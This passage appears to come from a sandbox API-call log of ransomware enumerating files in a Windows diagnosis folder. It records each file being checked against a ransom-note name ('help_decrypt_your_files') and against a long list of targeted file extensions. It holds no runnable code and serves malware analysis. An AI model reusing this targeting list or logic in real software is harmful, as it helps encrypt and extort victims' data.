0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rbs") returned 0x0
	[0168.085] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf5c28, dwReserved0=0x0, dwReserved1=0x0, cFileName="events10.rbs", cAlternateFileName="")) returned 1
	[0168.085] lstrcmpW (lpString1="events10.rbs", lpString2="..") returned 1
	[0168.085] lstrcmpW (lpString1="events10.rbs", lpString2=".") returned 1
	[0168.085] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.086] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="events10.rbs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events10.rbs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events10.rbs"
	[0168.086] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events10.rbs") returned 51
	[0168.086] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.086] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events10.rbs", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\events10.rbs") returned 0x33
	[0168.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.086] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\events10.rbs", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.086] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\events10.rbs" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\events10.rbs") returned="c:\\users\\all users\\microsoft\\diagnosis\\events10.rbs"
	[0168.087] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\events10.rbs") returned 51
	[0168.087] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.087] StrStrW (lpFirst=".rbs", lpSrch=".") returned=".rbs"
	[0168.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.087] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rbs") returned 0x0
	[0168.088] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2e147a, dwReserved0=0x0, dwReserved1=0x0, cFileName="events11.rbs", cAlternateFileName="")) returned 1
	[0168.088] lstrcmpW (lpString1="events11.rbs", lpString2="..") returned 1
	[0168.088] lstrcmpW (lpString1="events11.rbs", lpString2=".") returned 1
	[0168.088] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.088] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="events11.rbs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events11.rbs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events11.rbs"
	[0168.088] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events11.rbs") returned 51
	[0168.088] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.089] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events11.rbs", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\events11.rbs") returned 0x33
	[0168.089] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.089] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\events11.rbs", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.089] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\events11.rbs" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\events11.rbs") returned="c:\\users\\all users\\microsoft\\diagnosis\\events11.rbs"
	[0168.089] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\events11.rbs") returned 51
	[0168.089] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.090] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.090] StrStrW (lpFirst=".rbs", lpSrch=".") returned=".rbs"
	[0168.090] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.090] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", 